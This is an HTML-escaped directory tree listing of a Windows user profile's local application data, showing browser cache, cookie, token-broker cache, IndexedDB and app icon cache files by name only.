&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th[1].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th[2].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; trans[1].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; trans[2].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; trans[3].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 8EJ1CSVG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ANzUnPnVY0oL0XWxs0RLJxjJLUo.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th[1].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th[2].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; trans[1].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; trans[2].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EVGP4C0H
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; fpconfig.min[1].json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th[1].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th[2].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; trans[1].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MSIMGSIZ.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NWRG6VXJ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; th[1].jpg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; th[1].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; th[2].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; trans[1].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; trans[2].gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCookies
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ESE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CryptnetUrlCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Content
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MetaData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Internet Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; DOMStore
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; AU4DWQHA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; www.bing[1].xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TokenBroker
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Cache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CacheStorage
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CacheStorage.edb
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; CacheStorage.jfm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Indexed DB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; edb.chk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; edb.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; edbres00001.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; edbres00002.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; edbtmp.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; IndexedDB.edb
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; IndexedDB.jfm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppIconCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 100
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cmd_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe
